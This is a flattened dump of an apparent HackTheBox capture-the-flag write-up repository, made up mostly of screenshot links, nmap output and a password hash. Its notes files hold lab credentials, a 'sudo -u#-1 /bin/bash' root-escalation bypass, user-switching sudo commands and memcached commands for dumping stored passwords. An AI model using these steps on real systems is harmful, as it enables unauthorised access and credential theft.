https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/db-credentials.png
--------------------------------------------------------------------------------
/Admirer/images/ftp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/ftp.png
--------------------------------------------------------------------------------
/Admirer/images/new-credentials.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/new-credentials.png
--------------------------------------------------------------------------------
/Admirer/images/new-data.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/new-data.png
--------------------------------------------------------------------------------
/Admirer/images/phpinfo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/phpinfo.png
--------------------------------------------------------------------------------
/Admirer/images/robots.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/robots.png
--------------------------------------------------------------------------------
/Admirer/images/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/root.png
--------------------------------------------------------------------------------
/Admirer/images/ssh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/ssh.png
--------------------------------------------------------------------------------
/Admirer/images/sudo-enum.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/sudo-enum.png
--------------------------------------------------------------------------------
/Admirer/images/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Admirer/images/website.png
--------------------------------------------------------------------------------
/Bashed/images/End.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bashed/images/End.png
--------------------------------------------------------------------------------
/Bashed/images/ls_as_scriptmanager.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bashed/images/ls_as_scriptmanager.png
--------------------------------------------------------------------------------
/Bashed/images/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bashed/images/root.png
--------------------------------------------------------------------------------
/Bashed/images/scripts.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bashed/images/scripts.png
--------------------------------------------------------------------------------
/Bashed/images/sudo-l.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bashed/images/sudo-l.png
--------------------------------------------------------------------------------
/Bashed/images/webpage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bashed/images/webpage.png
--------------------------------------------------------------------------------
/Bashed/images/webshell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bashed/images/webshell.png
--------------------------------------------------------------------------------
/Blunder/files/1.txt:
--------------------------------------------------------------------------------
1 | NWEgNmQgNTYgNzkgNWEgMzMgNTYgN2E=
2 |
--------------------------------------------------------------------------------
/Blunder/files/Pictures/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/files/Pictures/1.png
--------------------------------------------------------------------------------
/Blunder/files/Pictures/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/files/Pictures/2.png
--------------------------------------------------------------------------------
/Blunder/files/buzz.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/files/buzz.wav
--------------------------------------------------------------------------------
/Blunder/files/ftp/note.txt:
--------------------------------------------------------------------------------
1 | Hey Sophie
2 | I've left the thing you're looking for in here for you to continue my work
3 | when I leave. The other thing is the same although Ive left it elsewhere too.
4 |
5 | Its using the method we talked about; dont leave it on a post-it note this time!
6 |
7 | Thanks
8 | Shaun
9 |
--------------------------------------------------------------------------------
/Blunder/files/hash.txt:
--------------------------------------------------------------------------------
1 | 5dde2887e7aca$bfcc887f62e36ea019e3295aafb8a3885966e265
2 |
--------------------------------------------------------------------------------
/Blunder/files/nmap/all.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sun Jun 21 23:50:59 2020 as: nmap -p- -sV -sV -v -oA nmap/all blunder.htb
2 | # Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
3 | Host: 10.10.10.191 (blunder.htb) Status: Up
4 | Host: 10.10.10.191 (blunder.htb) Ports: 21/closed/tcp//ftp///, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/ Ignored State: filtered (65533)
5 | # Nmap done at Mon Jun 22 00:00:43 2020 -- 1 IP address (1 host up) scanned in 584.46 seconds
6 |
--------------------------------------------------------------------------------
/Blunder/files/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sun Jun 21 23:51:50 2020 as: nmap -sV -sV -oA nmap/initial blunder.htb
2 | Host: 10.10.10.191 (blunder.htb) Status: Up
3 | Host: 10.10.10.191 (blunder.htb) Ports: 21/closed/tcp//ftp///, 80/open/tcp//http//Apache httpd 2.4.41 ((Ubuntu))/ Ignored State: filtered (998)
4 | # Nmap done at Sun Jun 21 23:52:06 2020 -- 1 IP address (1 host up) scanned in 16.39 seconds
5 |
--------------------------------------------------------------------------------
/Blunder/files/nmap/initial.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Sun Jun 21 23:51:50 2020 as: nmap -sV -sV -oA nmap/initial blunder.htb
2 | Nmap scan report for blunder.htb (10.10.10.191)
3 | Host is up (0.080s latency).
4 | Not shown: 998 filtered ports
5 | PORT STATE SERVICE VERSION
6 | 21/tcp closed ftp
7 | 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8 |
9 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
10 | # Nmap done at Sun Jun 21 23:52:06 2020 -- 1 IP address (1 host up) scanned in 16.39 seconds
11 |
--------------------------------------------------------------------------------
/Blunder/files/notes.txt:
--------------------------------------------------------------------------------
1 | fergus:RolandDeschain
2 | sudo -u shaun /bin/bash -c "/bin/bash"
3 | hugo:Password120
4 |
5 |
6 | sudo -u#-1 /bin/bash
7 |
8 | https://www.exploit-db.com/exploits/47502
9 |
10 | 5a6d56795a33567a >> ZmVyZ3Vz
11 |
--------------------------------------------------------------------------------
/Blunder/files/todo.txt:
--------------------------------------------------------------------------------
1 | -Update the CMS
2 | -Turn off FTP - DONE
3 | -Remove old users - DONE
4 | -Inform fergus that the new blog needs images - PENDING
5 |
--------------------------------------------------------------------------------
/Blunder/images/blundit1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/blundit1.png
--------------------------------------------------------------------------------
/Blunder/images/blundit2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/blundit2.png
--------------------------------------------------------------------------------
/Blunder/images/dirlist.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/dirlist.png
--------------------------------------------------------------------------------
/Blunder/images/exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/exploit.png
--------------------------------------------------------------------------------
/Blunder/images/fergus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/fergus.png
--------------------------------------------------------------------------------
/Blunder/images/ftp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/ftp.png
--------------------------------------------------------------------------------
/Blunder/images/github.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/github.png
--------------------------------------------------------------------------------
/Blunder/images/hash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/hash.png
--------------------------------------------------------------------------------
/Blunder/images/installations.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/installations.png
--------------------------------------------------------------------------------
/Blunder/images/password.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/password.png
--------------------------------------------------------------------------------
/Blunder/images/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/root.png
--------------------------------------------------------------------------------
/Blunder/images/searchsploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/searchsploit.png
--------------------------------------------------------------------------------
/Blunder/images/source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/source.png
--------------------------------------------------------------------------------
/Blunder/images/stego.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/stego.png
--------------------------------------------------------------------------------
/Blunder/images/sudo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/sudo.png
--------------------------------------------------------------------------------
/Blunder/images/user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/user.png
--------------------------------------------------------------------------------
/Blunder/images/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Blunder/images/website.png
--------------------------------------------------------------------------------
/Bucket/images/afterthoughts1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/afterthoughts1.png
--------------------------------------------------------------------------------
/Bucket/images/afterthoughts2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/afterthoughts2.png
--------------------------------------------------------------------------------
/Bucket/images/console1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/console1.png
--------------------------------------------------------------------------------
/Bucket/images/console2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/console2.png
--------------------------------------------------------------------------------
/Bucket/images/console3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/console3.png
--------------------------------------------------------------------------------
/Bucket/images/console4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/console4.png
--------------------------------------------------------------------------------
/Bucket/images/ec2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/ec2.png
--------------------------------------------------------------------------------
/Bucket/images/initial1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial1.png
--------------------------------------------------------------------------------
/Bucket/images/initial2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial2.png
--------------------------------------------------------------------------------
/Bucket/images/initial3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial3.png
--------------------------------------------------------------------------------
/Bucket/images/initial4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial4.png
--------------------------------------------------------------------------------
/Bucket/images/initial5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial5.png
--------------------------------------------------------------------------------
/Bucket/images/initial6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial6.png
--------------------------------------------------------------------------------
/Bucket/images/initial7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial7.png
--------------------------------------------------------------------------------
/Bucket/images/initial8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/initial8.png
--------------------------------------------------------------------------------
/Bucket/images/privesc1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc1.png
--------------------------------------------------------------------------------
/Bucket/images/privesc10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc10.png
--------------------------------------------------------------------------------
/Bucket/images/privesc11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc11.png
--------------------------------------------------------------------------------
/Bucket/images/privesc12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc12.png
--------------------------------------------------------------------------------
/Bucket/images/privesc13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc13.png
--------------------------------------------------------------------------------
/Bucket/images/privesc14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc14.png
--------------------------------------------------------------------------------
/Bucket/images/privesc15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc15.png
--------------------------------------------------------------------------------
/Bucket/images/privesc2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc2.png
--------------------------------------------------------------------------------
/Bucket/images/privesc3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc3.png
--------------------------------------------------------------------------------
/Bucket/images/privesc4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc4.png
--------------------------------------------------------------------------------
/Bucket/images/privesc5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc5.png
--------------------------------------------------------------------------------
/Bucket/images/privesc6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc6.png
--------------------------------------------------------------------------------
/Bucket/images/privesc7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc7.png
--------------------------------------------------------------------------------
/Bucket/images/privesc8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc8.png
--------------------------------------------------------------------------------
/Bucket/images/privesc9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/privesc9.png
--------------------------------------------------------------------------------
/Bucket/images/user1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user1.png
--------------------------------------------------------------------------------
/Bucket/images/user2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user2.png
--------------------------------------------------------------------------------
/Bucket/images/user3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user3.png
--------------------------------------------------------------------------------
/Bucket/images/user4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user4.png
--------------------------------------------------------------------------------
/Bucket/images/user5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user5.png
--------------------------------------------------------------------------------
/Bucket/images/user_creds1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user_creds1.png
--------------------------------------------------------------------------------
/Bucket/images/user_creds2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user_creds2.png
--------------------------------------------------------------------------------
/Bucket/images/user_creds3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Bucket/images/user_creds3.png
--------------------------------------------------------------------------------
/Cache/files/files/config/services.yml:
--------------------------------------------------------------------------------
1 | services:
2 | sample_subscriber:
3 | class: OpenEMR\Sample\Event\SampleSubscriber
4 | tags:
5 | - { name: kernel.event_subscriber }
6 | admin.admin_menu_builder:
7 | class: OpenEMR\Admin\Service\AdminMenuBuilder
8 | arguments: [@event_dispatcher]
9 | calendar.event_subscriber:
10 | class: OpenEMR\Calendar\EventListener\CalendarSubscriber
11 | tags:
12 | - { name: kernel.event_subscriber }
--------------------------------------------------------------------------------
/Cache/files/hash.txt:
--------------------------------------------------------------------------------
1 | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
2 |
--------------------------------------------------------------------------------
/Cache/files/nmap/all.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.70 scan initiated Wed Jun 10 15:44:38 2020 as: nmap -v -p- -Pn -oA nmap/all cache.htb
2 | # Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
3 | Host: 10.10.10.188 (cache.htb) Status: Up
4 | Host: 10.10.10.188 (cache.htb) Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (65533)
5 | # Nmap done at Wed Jun 10 15:57:16 2020 -- 1 IP address (1 host up) scanned in 757.71 seconds
6 |
--------------------------------------------------------------------------------
/Cache/files/nmap/all.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.70 scan initiated Wed Jun 10 15:44:38 2020 as: nmap -v -p- -Pn -oA nmap/all cache.htb
2 | Nmap scan report for cache.htb (10.10.10.188)
3 | Host is up (0.072s latency).
4 | Not shown: 65533 closed ports
5 | PORT STATE SERVICE
6 | 22/tcp open ssh
7 | 80/tcp open http
8 |
9 | Read data files from: /usr/bin/../share/nmap
10 | # Nmap done at Wed Jun 10 15:57:16 2020 -- 1 IP address (1 host up) scanned in 757.71 seconds
11 |
--------------------------------------------------------------------------------
/Cache/files/nmap/initial.gnmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.70 scan initiated Wed Jun 10 10:28:54 2020 as: nmap -sV -sC -oA nmap/initial cache.htb
2 | Host: 10.10.10.188 (cache.htb) Status: Up
3 | Host: 10.10.10.188 (cache.htb) Ports: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/ Ignored State: closed (998)
4 | # Nmap done at Wed Jun 10 10:29:18 2020 -- 1 IP address (1 host up) scanned in 24.47 seconds
5 |
--------------------------------------------------------------------------------
/Cache/files/notes.txt:
--------------------------------------------------------------------------------
1 | ash:H@v3_fun
2 |
3 | https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf:
4 |
5 | https://community.open-emr.org/t/security-updates-for-user-password-scheme/6256 -> blowfish + salt
6 |
7 | openemr_admin:xxxxxx
8 |
9 | stats items
10 | stats cachedump 1 0
11 | get user
12 | get passwd
13 |
14 | luffy:0n3_p1ec3
15 |
--------------------------------------------------------------------------------
/Cache/files/pspy32:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/files/pspy32
--------------------------------------------------------------------------------
/Cache/images/ash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/ash.png
--------------------------------------------------------------------------------
/Cache/images/author.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/author.png
--------------------------------------------------------------------------------
/Cache/images/credentials1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/credentials1.png
--------------------------------------------------------------------------------
/Cache/images/dirsearch1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/dirsearch1.png
--------------------------------------------------------------------------------
/Cache/images/dirsearch2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/dirsearch2.png
--------------------------------------------------------------------------------
/Cache/images/docker1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/docker1.png
--------------------------------------------------------------------------------
/Cache/images/hash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/hash.png
--------------------------------------------------------------------------------
/Cache/images/hms.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/hms.png
--------------------------------------------------------------------------------
/Cache/images/hms1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/hms1.png
--------------------------------------------------------------------------------
/Cache/images/hms2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/hms2.png
--------------------------------------------------------------------------------
/Cache/images/hms3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/hms3.png
--------------------------------------------------------------------------------
/Cache/images/login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/login.png
--------------------------------------------------------------------------------
/Cache/images/net.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/net.png
--------------------------------------------------------------------------------
/Cache/images/rce.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/rce.png
--------------------------------------------------------------------------------
/Cache/images/report.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/report.png
--------------------------------------------------------------------------------
/Cache/images/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/root.png
--------------------------------------------------------------------------------
/Cache/images/source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/source.png
--------------------------------------------------------------------------------
/Cache/images/sql1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/sql1.png
--------------------------------------------------------------------------------
/Cache/images/sql2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/sql2.png
--------------------------------------------------------------------------------
/Cache/images/sql3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/sql3.png
--------------------------------------------------------------------------------
/Cache/images/sql4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/sql4.png
--------------------------------------------------------------------------------
/Cache/images/sql5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/sql5.png
--------------------------------------------------------------------------------
/Cache/images/sql6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/sql6.png
--------------------------------------------------------------------------------
/Cache/images/sql7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/sql7.png
--------------------------------------------------------------------------------
/Cache/images/unauth.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/unauth.png
--------------------------------------------------------------------------------
/Cache/images/unauth2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/unauth2.png
--------------------------------------------------------------------------------
/Cache/images/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Cache/images/website.png
--------------------------------------------------------------------------------
/Canape/images/checkout.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/diego95root/HackTheBox/8ba3c7c0a5cc6fa40fc865014235eb40f377df6b/Canape/images/checkout.png
--------------------------------------------------------------------------------
/Canape/images/dump.png:
--------------------------------------------------------------------------------
